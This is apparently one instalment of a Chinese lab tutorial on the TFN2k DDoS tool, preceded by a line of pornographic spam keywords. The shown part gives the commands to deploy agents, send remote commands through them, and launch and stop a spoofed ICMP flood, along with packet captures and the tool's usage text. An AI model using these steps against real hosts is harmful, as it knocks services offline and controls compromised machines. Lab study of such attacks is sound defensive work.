日本免费全黄少妇一区二区三区-高清无码一区二区三区四区-欧美中文字幕日韩在线观看-国产福利诱惑在线网站-国产中文字幕一区在线-亚洲欧美精品日韩一区-久久国产精品国产精品国产-国产精久久久久久一区二区三区-欧美亚洲国产精品久久久久

tfn2k 分布式拒絕服務(wù)攻擊攻擊及iptables過濾測(cè)試( 三 )


[root@ ag1 wjpfjy/]./td
//運(yùn)行td,這樣你就擁有一個(gè)代理了,它會(huì)對(duì)你唯命是從的:( 。
用同樣的方法在ag2 (192.168.0.3)上安裝并運(yùn)行TFN2k進(jìn)程td.
6.攻擊開始(悲慘的回憶上演中...)
回到master(192.168.0.6 ),準(zhǔn)備演練...

 [root@master root]#touch host.txt
//建立代理記錄文件(因?yàn)槿绻阕銐驘o聊的話,有可能會(huì)建立很多的肉雞-
//代理,不記下會(huì)忘記的噢.)
[root@master root]echo "192.168.0.2" > host.txt 將執(zhí)行過td的ag1加入host.txt 。
[root@master root]echo "192.168.0.3" >> host.txt 添加ag2到host.txt .
先來測(cè)試一下鏈接 。
[root@master root]./tfn -f host.txt -c 10 -i "mkdir wjpfjy" 與host.txt中的代理通訊,讓其執(zhí)行命令mkdir wjpfjy即建立一個(gè)目錄

Protocol : random
Source IP : random
Client input : list
Command : execute remote command
Password verification:
//這里,會(huì)被提示輸入密碼,也就是編譯時(shí)輸入的密碼,如果錯(cuò)了,將無法與td進(jìn)程通訊
Sending out packets: ..
到ag1和ag2看看有沒有建立目錄名wjpfjy,一般情況下,會(huì)存在于td的同一目錄,如果不確定,可以用find / -name wjpfjy -print來查找
[root@master root]./tfn -f host.txt -c 6 -i 192.168.0.5 開始ICMP/PING 攻擊aim...(可憐我的P4啊,不到5分鐘,就跟386一樣慢),不過它在game over前,還是很艱辛的記錄下了攻擊數(shù)據(jù),也算是對(duì)得住的那NK大洋啦.這是tcpdump的抓包記錄.

[root@aim root]# tcpdump -r pack.atta -c 4 -xX
08:03:36.524907 23.43.171.0 > 192.168.0.5 icmp: echo request [ttl 0]
0x0000 4500 005c 659d 0000 0001 d22e 172b ab00 E..e........ ..
0x0010 c0a8 0002 0800 f7ff 0000 0000 0000 0000 ................
0x0020 0000 0000 0000 0000 0000 0000 0000 0000 ................
0x0030 0000 0000 0000 0000 0000 0000 0000 0000 ................
0x0040 0000 0000 0000 0000 0000 0000 0000 0000 ................
0x0050 0000 ..
08:03:36.524933 192.168.0.5 > 23.43.171.0: icmp: echo reply
0x0000 4500 005c a5d5 0000 4001 51f6 c0a8 0002 E......@.Q.....
0x0010 172b ab00 0000 ffff 0000 0000 0000 0000 . ..............
0x0020 0000 0000 0000 0000 0000 0000 0000 0000 ................
0x0030 0000 0000 0000 0000 0000 0000 0000 0000 ................
0x0040 0000 0000 0000 0000 0000 0000 0000 0000 ................
0x0050 0000 ..
08:03:36.524944 36.235.130.0 > 192.168.0.5: icmp: echo request [ttl 0]
0x0000 4500 005c 659d 0000 0001 ed6e 24eb 8200 E..e......n$...
0x0010 c0a8 0002 0800 f7ff 0000 0000 0000 0000 ................
0x0020 0000 0000 0000 0000 0000 0000 0000 0000 ................
0x0030 0000 0000 0000 0000 0000 0000 0000 0000 ................
0x0040 0000 0000 0000 0000 0000 0000 0000 0000 ................
0x0050 0000 ..
08:03:36.524984 192.168.0.5 > 36.235.130.0: icmp: echo reply
0x0000 4500 005c 551c 0000 4001 bdef c0a8 0002 E..U...@.......
0x0010 24eb 8200 0000 ffff 0000 0000 0000 0000 $...............
0x0020 0000 0000 0000 0000 0000 0000 0000 0000 ................
0x0030 0000 0000 0000 0000 0000 0000 0000 0000 ................
0x0040 0000 0000 0000 0000 0000 0000 0000 0000 ................
[root@master root]./tfn -f host.txt -c 0 停止攻擊

Protocol : random
Source IP : random
Client input : list
Command : stop flooding
Password verification:
Sending out packets: ...
當(dāng)然還有別的攻擊方法,你只要用-c X就可以更改攻擊方法.

[root@master root]./tfn
usage: ./tfn
[-P protocol] Protocol for server communication. Can be ICMP, UDP or TCP.
Uses a random protocol as default
[-D n] Send out n bogus requests for each real one to decoy targets
[-S host/ip] Specify your source IP. Randomly spoofed by default, you need
to use your real IP if you are behind spoof-filtering routers
[-f hostlist] Filename containing a list of hosts with TFN servers to contact
[-h hostname] To contact only a single host running a TFN server

推薦閱讀